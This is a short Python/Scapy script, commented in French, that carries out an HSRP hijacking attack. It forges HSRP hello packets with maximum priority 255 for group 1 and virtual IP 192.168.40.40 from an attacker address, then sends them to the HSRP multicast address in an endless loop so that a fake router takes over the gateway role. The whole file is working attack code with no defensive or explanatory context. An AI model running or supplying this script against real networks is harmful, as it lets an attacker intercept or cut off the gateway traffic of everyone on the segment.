#!/usr/bin/env python3

from scapy.all import *

# Paramètres de l'attaque
src_ip = "192.168.40.11"   # Adresse IP source de l'attaquant
dst_ip = "224.0.0.2"     # Adresse IP multicast HSRP
src_port = 1985          # Port source
dst_port = 1985          # Port destination
group_num = 1            # Numéro du groupe HSRP
priority = 255           # Priorité du faux routeur HSRP
virtual_ip = "192.168.40.40"  # Adresse IP virtuelle du groupe HSRP

# Création du paquet HSRP
ip = IP(src=src_ip, dst=dst_ip)
udp = UDP(sport=src_port, dport=dst_port)
hsrp = HSRP(group=group_num, priority=priority, virtualIP=virtual_ip)
pkt = ip/udp/hsrp

# Envoi du paquet en boucle
while True:
    send(pkt,inter=3,loop=1)



